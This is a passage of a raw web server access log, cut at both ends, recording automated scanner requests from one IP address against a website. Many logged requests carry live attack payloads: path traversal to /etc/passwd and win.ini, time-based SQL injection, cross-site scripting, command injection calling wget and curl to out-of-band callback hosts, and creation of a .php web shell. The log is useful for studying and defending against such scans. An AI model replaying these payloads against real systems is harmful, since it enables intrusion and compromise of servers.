"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/doenterpagevariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - caldav_public_user@localhost [24/Apr/2025:07:02:57 -0400] "DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - caldav_public_user@localhost [24/Apr/2025:07:03:21 -0400] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 200 119072 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:03:23 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/618.31.14 (KHTML, like Gecko) Version/17.7 Safari/618.31.14" 154.84.62.234 - - [24/Apr/2025:07:04:15 -0400] "GET /owa/auth/x.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:04:43 -0400] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:04:45 -0400] "POST /patient/search_result.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:04:49 -0400] "POST /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:05:10 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:05:25 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:06:02 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:06:12 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:06:16 -0400] "POST /api/snapshots HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:08:22 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.27" 154.84.62.234 - - [24/Apr/2025:07:10:06 -0400] "POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363" 154.84.62.234 - - [24/Apr/2025:07:10:42 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:10:43 -0400] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - guest [24/Apr/2025:07:11:04 -0400] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.5.20" 154.84.62.234 - admin [24/Apr/2025:07:11:09 -0400] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.27" 154.84.62.234 - - [24/Apr/2025:07:11:20 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - guest [24/Apr/2025:07:11:46 -0400] "GET /backup2.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - admin [24/Apr/2025:07:11:52 -0400] "GET /backup2.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:07:12:04 -0400] "POST /seo/seopanel/login.php?sec=forgot HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:12:05 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 154.84.62.234 - guest [24/Apr/2025:07:12:05 -0400] "POST /tools.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id/tools.cgi" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:12:05 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" 154.84.62.234 - admin [24/Apr/2025:07:12:10 -0400] "POST /tools.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id/tools.cgi" "Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:12:39 -0400] "POST /HandleEvent HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:12:46 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:12:48 -0400] "PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0" 154.84.62.234 - - [24/Apr/2025:07:12:53 -0400] "POST /redfish/v1/SessionService/Sessions/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:07:13:02 -0400] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:13:10 -0400] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 200 0 "-" "Nacos-Server" 154.84.62.234 - - [24/Apr/2025:07:13:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.1) AppleWebKit/618.27 (KHTML, like Gecko) Version/17.4 Safari/618.27" 154.84.62.234 - - [24/Apr/2025:07:13:28 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:13:41 -0400] "POST /goform/setmac HTTP/1.1" 200 0 "https://mgrokokbet.id/index.htmlr" "Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:14:02 -0400] "POST / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:14:14 -0400] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(8)))xoOt) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:14:19 -0400] "GET /module/productcomments/CommentGrade?id_products[]=1*if(now()=sysdate()%2Csleep(8)%2C0) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.6.16" 154.84.62.234 - - [24/Apr/2025:07:14:52 -0400] "GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1" 200 0 "https://mgrokokbet.id" "asusrouter--" 154.84.62.234 - - [24/Apr/2025:07:15:30 -0400] "GET /search.php?search=%22;wget+http%3A%2F%2Fd04qr7ij4pq19d75k490bspy3a3rw9khd.oast.online%27;%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:07:15:51 -0400] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=2w9rfcwlQSpBxAF0zRcFOYag4GJ.php&target=l1_Lw HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:16:04 -0400] "GET /t/index.php?action[]=aaaa HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:16:15 -0400] "GET /status.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:16:44 -0400] "POST /RPC2_Login HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:17:13 -0400] "GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://d04qr7ij4pq19d75k490npegngfoptdrb.oast.online)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.15" 154.84.62.234 - - [24/Apr/2025:07:17:47 -0400] "GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:07:17:47 -0400] "POST /tc.CBS.Appl/tcspseudo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:18:21 -0400] "POST /_ignition/execute-solution HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:07:18:25 -0400] "POST /_ignition/execute-solution HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.27" 154.84.62.234 - - [24/Apr/2025:07:18:30 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:07:18:36 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:18:41 -0400] "POST /_ignition/execute-solution HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:18:45 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:19:01 -0400] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:07:19:10 -0400] "GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:19:25 -0400] "GET /%u002e/WEB-INF/web.xml HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:07:19:55 -0400] "POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:20:18 -0400] "POST /goform/formWsc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:07:20:44 -0400] "GET /?action=command&command=set_city_timezone&value=$(wget%20http://d04qr7ij4pq19d75k4905rfhes57bpker.oast.online)) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:21:02 -0400] "GET /bludit/admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:21:17 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:21:23 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:21:28 -0400] "GET /wp-admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:21:48 -0400] "POST /cgi/networkDiag.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:07:22:22 -0400] "PUT /SDK/webLanguage HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:22:28 -0400] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:22:28 -0400] "GET /x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:22:28 -0400] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:22:33 -0400] "GET /2w9rfZaegckUtmox9ngqw5zJpwm.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//d04qr7ij4pq19d75k490m9tiikesim9tm.oast.online+-H+'User-Agent%3a+3A8PnQ'\")}' HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" 154.84.62.234 - - [24/Apr/2025:07:22:33 -0400] "GET /dashboardUser HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.45" 154.84.62.234 - - [24/Apr/2025:07:22:51 -0400] "GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.16.12 (KHTML, like Gecko) Version/17.7.92 Safari/617.16.12" 154.84.62.234 - - [24/Apr/2025:07:23:16 -0400] "GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5) AppleWebKit/617.19 (KHTML, like Gecko) Version/17.6.47 Safari/617.19" 154.84.62.234 - - [24/Apr/2025:07:23:16 -0400] "POST /home/download HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:23:21 -0400] "GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:07:23:35 -0400] "POST /wsman HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:07:23:38 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:24:05 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041" 154.84.62.234 - - [24/Apr/2025:07:24:16 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24" 154.84.62.234 - - [24/Apr/2025:07:24:26 -0400] "GET /wp-admin/admin-ajax.php?action=280b059023b35979da9ee2d4657804cf HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:24:31 -0400] "GET /wp-admin/admin-ajax.php?action=1cac25121ae8293459fe69f8dc8cbb7c HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:24:55 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:07:25:10 -0400] "POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:07:25:18 -0400] "POST /controller/login.php?acao=autenticar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:25:21 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:25:24 -0400] "POST /controller/login.php?acao=autenticar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063" 154.84.62.234 - - [24/Apr/2025:07:26:03 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:07:26:33 -0400] "GET /api/v1/components?name=1&1%5B0%5D&1%5B1%5D=a&1%5B2%5D&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:26:35 -0400] "POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:28:33 -0400] "GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:07:29:30 -0400] "POST /cobbler_api HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:29:46 -0400] "GET /geoserver/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:29:50 -0400] "GET /about/../tree?action=get HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.18" 154.84.62.234 - - [24/Apr/2025:07:31:05 -0400] "POST /install.php?page=4 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:31:06 -0400] "POST /install.php?page=4 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" 154.84.62.234 - - [24/Apr/2025:07:31:25 -0400] "POST /install.php?page=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:31:30 -0400] "POST /v1/backend1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:07:31:35 -0400] "GET /v1/2w9rfWTh24NDL8bVRlWffySuWgh.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:32:13 -0400] "POST /install.php?page=4 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.35" 154.84.62.234 - - [24/Apr/2025:07:32:44 -0400] "POST /install.php?page=4 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:32:46 -0400] "POST /install.php?page=4 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:07:32:55 -0400] "POST /./RestAPI/LogonCustomization HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:33:05 -0400] "POST /./RestAPI/LogonCustomization HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:07:33:14 -0400] "POST /api/v1/login/oauth2/auth HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" 154.84.62.234 - - [24/Apr/2025:07:33:14 -0400] "POST /./RestAPI/Connection HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 154.84.62.234 - - [24/Apr/2025:07:33:19 -0400] "GET /help/admin-guide/test.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" 154.84.62.234 - - [24/Apr/2025:07:33:24 -0400] "GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:33:26 -0400] "POST /viewlog.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:33:50 -0400] "POST /autodiscover/autodiscover.json HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0" 154.84.62.234 - - [24/Apr/2025:07:33:51 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; 